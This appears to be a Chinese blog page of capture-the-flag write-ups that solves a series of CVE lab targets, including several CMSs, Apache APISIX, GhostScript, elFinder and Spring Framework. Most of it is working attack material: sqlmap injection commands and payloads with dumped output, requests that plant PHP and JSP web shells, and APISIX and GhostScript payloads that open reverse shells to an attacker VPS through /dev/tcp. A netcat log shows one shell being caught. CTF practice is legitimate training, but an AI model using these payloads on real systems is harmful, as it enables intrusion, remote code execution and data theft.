you have not declared cookie(s), while server wants to set its own ('wp-payment-init=94417c57d1e...7f1d7aa40b'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: {"id":"1u0027 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x486f515a4463696543426350494464454f6e5151634e6e7744465050424855734b62644b5a786e48,0x7178786271),NULL,NULL,NULL-- - "}
---
[04:21:14] [INFO] testing MySQL
[04:21:14] [INFO] confirming MySQL
[04:21:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:21:15] [INFO] fetching columns for table 'flag' in database 'ctf'
[04:21:15] [INFO] fetching entries for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{634833d6-66d7-4d5b-a5db-ba5128c43206} |
+--------------------------------------------+
CVE-2022-32991
靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
0x01 先去注册一下 register.php
0x02 抓包,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u 'http://eci-2ze9clflsbycrnudeen8.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=3' --cookie='PHPSESSID=o7hg51g2u1evpbv9577f6aj3tk' --dbms mysql --level 5 --risk 3 -D ctf -T flag --dump
___
__H__
___ ___[']_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 03:34:41 /2023-06-18/
[03:34:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: q=quiz&step=2&eid=-5722' OR 4054=4054-- MpfH&n=1&t=3
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8610 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SELECT (ELT(8610=8610,1))),0x7171707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WEHO&n=1&t=3
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 2521 FROM (SELECT(SLEEP(5)))QEbQ)-- bEvw&n=1&t=3
---
[03:34:41] [INFO] testing MySQL
[03:34:41] [INFO] confirming MySQL
[03:34:41] [WARNING] reflective value(s) found and filtering out
[03:34:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:34:41] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:34:41] [INFO] retrieved: 'flag'
[03:34:41] [INFO] retrieved: 'varchar(1024)'
[03:34:41] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:34:41] [INFO] retrieved: 'flag{1200a2e3-5580-4a25-933c-15ce8990989e}'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{1200a2e3-5580-4a25-933c-15ce8990989e} |
+--------------------------------------------+
CVE-2021-41947
靶标介绍:
Subrion CMS v4.2.1 存在sql注入
0x01 注入没找到。用database功能查看的flag
CVE-2021-21315
靶标介绍:
systeminformation是一个简单的查询系统和OS信息包
0x01 直接get一下(api后面自己思考一下)
0x02 VPS先监听,再get一下执行,/tmp/shell.sh,VPS就可以得到shell,cat /flag即可
CVE-2022-26201
靶标介绍:
Victor CMS v1.0 存在二次注入漏洞
0x01 去搜索框抓包,然后放到sqlmap里跑
Parameter: search (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: search=asdfasd' OR NOT 6702=6702-- svUW&submit=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: search=asdfasd' AND GTID_SUBSET(CONCAT(0x7162626a71,(SELECT (ELT(2851=2851,1))),0x716b6a7a71),2851)-- nFoG&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=asdfasd' AND (SELECT 3479 FROM (SELECT(SLEEP(5)))JdXG)-- FVfR&submit=
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: search=asdfasd' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162626a71,0x7072484f76784a56476177555a484862736878625766524263706f6245677648446a68516a456753,0x716b6a7a71),NULL,NULL,NULL,NULL,NULL-- -&submit=
CVE-2018-7448
靶标介绍:
CMS Made Simple 2.1.6版本存在代码注入漏洞,可以通过 timezone 参数执行任意代码
https://www.exploit-db.com/exploits/44192
0x01 按照exploit-db的操作,在第四步的时候在时区位置插入php代码
CVE-2020-13933
靶标介绍:
Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。
CVE-2022-23043
Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12
https://blog.csdn.net/niubi707/article/details/128172885 懒得截图
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞
0x01 使用admin tao登录网站
0x02 找到文件管理抓包改为
CVE-2022-24663
靶标介绍:
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
0x01 使用test test登录
0x02 提交包
<form action="http://eci-2zea4q7aktwogzbj97j8.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode"/>
<textarea name="shortcode">[php_everywhere]<?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2FiY2QnXSk7ID8+")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute"/>
</form>
0x03 菜刀连接 shell在根目录
CVE-2022-26965
靶标介绍:
Pluck-CMS-Pluck-4.7.16 后台RCE
https://www.exploit-db.com/exploits/50826 (exp是tar压缩包,但是装不上)
0x01 登录后台,密码admin
0x02 找到主题安装的地方,将名为shell.php的一句话压缩成shell.zip传上去安装
0x03 http://url//data/themes/shell/shell.php 菜刀连接
CVE-2022-28525
靶标介绍:
ED01-CMS v20180505 存在任意文件上传漏洞
0x01 使用admin admin登录后台
0x02 找到添加用户,上传shell.jpg,抓包后将后缀改为php (github上的是修改用户,改半天居然没成功)
0x03 查看所有用户,找到上传路径,菜刀连接
CVE-2022-25099
靶标介绍:
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
0x01 使用admin 123456登录后台
0x02 http://url/admin/languages/index.php
0x03 弄php文件
<?php
echo "i've got a shell!";
eval($_REQUEST['cmd']);
system('cat /flag');
?>
CVE-2022-24112
靶标介绍:
Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
https://raw.githubusercontent.com/Acczdy/CVE-2022-24112_POC/main/CVE-2022-24112_Linux_by_twseptian.py
0x01 提交POST请求
POST /apisix/batch-requests HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: eci-2zeecfuzcehwb6ukuaq4.cloudeci1.ichunqiu.com:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 504
{"headers": {"X-Real-IP": "127.0.0.1", "X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1", "Content-Type": "application/json"}, "timeout": 1500, "pipeline": [{"path": "/apisix/admin/routes/index", "method": "PUT", "body": "{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/VPSIP/80;sh <&160 >&160 2>&160\\\"'); return true end"}"}]}
0x02 VPS上监听端口,提交GET请求
GET /rms/fzxewh HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: eci-2zeecfuzcehwb6ukuaq4.cloudeci1.ichunqiu.com:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
0x03 VPS获取shell,查看flag
CVE-2021-40280
靶标介绍:
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/dl_sendmail.php存在sql注入漏洞
0x01 设计POST的包,sqlmap直接跑
POST包
POST /admin/dl_sendmail.php HTTP/1.1
Host: eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=5lfm2c7ngomm8k8rpd3cbuhbf0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
id[0]=0&id[1]=1 *
sqlmap
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r 'sql zzcms-admin-dl_sendmail.txt' --dbms mysql --level 5 --risk 3 --tech T --time-sec 2 --tamper="between.py" -T flag --dump
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:20:32 /2023-07-16/
[08:20:32] [INFO] parsing HTTP request from 'sql zzcms-admin-dl_sendmail.txt'
[08:20:32] [INFO] loading tamper module 'between'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
Array-like data found in POST body. Do you want to process it? [Y/n/q] y
[08:20:33] [INFO] testing connection to the target URL
[08:20:34] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Array-like #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id[0]=0&id[1]=1 ) AND (SELECT 9057 FROM (SELECT(SLEEP(2)))sHZL)-- CsNP
---
[08:20:34] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:20:34] [INFO] testing MySQL
[08:20:34] [INFO] confirming MySQL
[08:20:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:20:34] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:20:34] [INFO] fetching current database
[08:20:34] [INFO] resumed: zzcms
[08:20:34] [INFO] fetching columns for table 'flag' in database 'zzcms'
[08:20:34] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[08:20:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[08:20:38] [INFO] retrieved: flag
[08:21:04] [INFO] fetching entries for table 'flag' in database 'zzcms'
[08:21:04] [INFO] fetching number of entries for table 'flag' in database 'zzcms'
[08:21:04] [INFO] retrieved: 1
[08:21:07] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{cd5dba6e-209f-49e6-aa6b-f5cd313dae8e}
Database: zzcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{cd5dba6e-209f-49e6-aa6b-f5cd313dae8e} |
+--------------------------------------------+
[08:26:28] [INFO] table 'zzcms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com/dump/zzcms/flag.csv'
[08:26:28] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com'
[*] ending @ 08:26:28 /2023-07-16/
CVE-2021-40282
靶标介绍:
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.3中dl/dl_download.php存在sql注入
0x01 和上面的一样,只不过要先注册用户才能访问dl/dl_download.php。然后抓包放到sqlmap里跑。
CVE-2018-16509
靶标介绍:
GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL(Pillow),因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响。
https://blog.csdn.net/niubi707/article/details/128147965?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4-128147965-blog-115359495.235%5Ev38%5Epc_relevant_sort_base1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4-128147965-blog-115359495.235%5Ev38%5Epc_relevant_sort_base1&utm_relevant_index=5
0x01 参考上面csdn连接写入shell,给权限,反弹
POST / HTTP/1.1
Host: eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------179587528241366875881954471737
Content-Length: 485
Origin: http://eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com/
Upgrade-Insecure-Requests: 1
-----------------------------179587528241366875881954471737
Content-Disposition: form-data; name="file"; filename="ghostscript.jpg"
Content-Type: image/jpeg
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%/bin/bash /tmp/shell.sh) currentdevice putdeviceprops
chmod 777 /tmp/shell.sh
echo 'bash -i >& /dev/tcp/VPS/80 0>&1' >> /tmp/shell.sh
-----------------------------179587528241366875881954471737--
CVE-2022-0543
靶标介绍:
Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。
抄的,没有找到和redis有关的东西
http://eci-2ze7rkzaiuviku2zw2rg.cloudeci1.ichunqiu.com/?url=file:///flag
CVE-2022-2073
靶标介绍:
Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
0x01 先建立账号登录进去
0x02 选择home-pages
0x03 在文章中添加payload
{{['cat\x20/flag']|filter('system')}}
0x04 回到首页查看flag
CVE-2021-32682
靶标介绍:
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 JavaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入
0x01 进入编辑器页面
0x02 创建11.txt文件
0x03 将11.txt压缩成11.txt.zip
0x04 将11.txt.zip压缩成11.txt.txt.zip,这个时候抓包
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=echo '<?php @eval($_POST[a]);?>'>shell1.php%20%23%20a.zip&target=l1_Lw&targets%5B%5D=l1_MTEudHh0LnppcA&type=application%2Fzip&reqid=18bc66965d060 HTTP/1.1
Host: eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com/elfinder.html
Cookie: PHPSESSID=m75cqp2289k62uo1j3vp9o73g5
将echo '<?php @eval($_POST[a]);?>'
url编码后发送得到shell
http://eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com/files/shell1.php
CVE-2018-19422
靶标介绍:
Subrion CMS 4.2.1 存在文件上传漏洞
0x01 界面右上角找到后台,admin admin进入后台
0x02 http://url.com/panel/uploads找到上传
0x03 上传一句话,将一句话改为pht后缀,菜刀链接
CVE-2019-16692
靶标介绍:
phpIPAM 1.4后台存在SQL Injection
poc:https://www.exploit-db.com/exploits/47438
0x01 admin admin888进入后台
0x02 抓包
POST /app/admin/custom-fields/filter-result.php HTTP/1.1
Host: eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: phpipam=ki8jfm9gdt9dtmcvmu19aarip7
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
action=add&table=users`where 1=(updatexml(1,concat(0x3a,(*)),1))#
0x03 sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r 44.txt --dbms mysql -D phpipam -T flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:04:45 /2023-11-13/
[22:04:45] [INFO] parsing HTTP request from '44.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[22:04:46] [INFO] testing connection to the target URL
[22:04:46] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: inline query
Title: Generic inline queries
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,((SELECT CONCAT(CONCAT(0x716a717871,(CASE WHEN (1877=1877) THEN 0x31 ELSE 0x30 END)),0x716a626271)))),1))#
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (ELT)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,(ELT(7364=7364,6803))),1))#
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,(GTID_SUBSET(CONCAT(0x716a717871,(SELECT (ELT(9718=9718,1))),0x716a626271),9718))),1))#
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,((SELECT 9328 FROM (SELECT(SLEEP(5)))EiHc))),1))#
---
[22:04:46] [INFO] testing MySQL
[22:04:46] [INFO] confirming MySQL
[22:04:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:04:47] [INFO] fetching columns for table 'flag' in database 'phpipam'
[22:04:47] [INFO] retrieved: 'flag'
[22:04:47] [INFO] retrieved: 'varchar(1024)'
[22:04:47] [INFO] fetching entries for table 'flag' in database 'phpipam'
[22:04:48] [INFO] retrieved: 'flag{93392325-5cb1-498e-a5fa-8da03b67af4e}'
Database: phpipam
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{93392325-5cb1-498e-a5fa-8da03b67af4e} |
+--------------------------------------------+
[22:04:48] [INFO] table 'phpipam.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com/dump/phpipam/flag.csv'
[22:04:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com'
[22:04:48] [WARNING] your sqlmap version is outdated
[*] ending @ 22:04:48 /2023-11-13/
CVE-2019-16113
靶标介绍:在Bludit<=3.9.2的版本中,攻击者可以通过定制uuid值将文件上传到指定的路径,然后通过bl-kernel/ajax/upload-images.php远程执行任意代码
0x01 下载poc https://github.com/hg8/CVE-2019-16113-PoC/blob/master/CVE-2019-16113.py,将用户名、密码修改为admin,123456,将反弹命令修改为自己的vps
0x02 vps监听端口,执行poc,得到shell,查看flag
[root@hk5LXA7VR9G6 ~]# nc -lvvp 8000
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 39.106.20.178.
Ncat: Connection from 39.106.20.178:20729.
bash: cannot set terminal process group (36): Inappropriate ioctl for device
bash: no job control in this shell
www-data@engine-2:/var/www/html/bl-content/tmp$ cat /flag
cat /flag
flag{74251d5d-057a-424f-b755-4be726841e07}www-data@engine-2:/var/www/html/bl-content/tmp$ ^C
[root@hk5LXA7VR9G6 ~]# ^C
CVE-2022-22965
靶标介绍:
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。
0x01 直接找poc,burpsuite发包
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: eci-2zeaw7dgcori1fi9cf6p.cloudeci1.ichunqiu.com:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
0x02 http://url/tomcatwar.jsp&pwd=j&cmd=cat /flag 获取flag
共有 0 条评论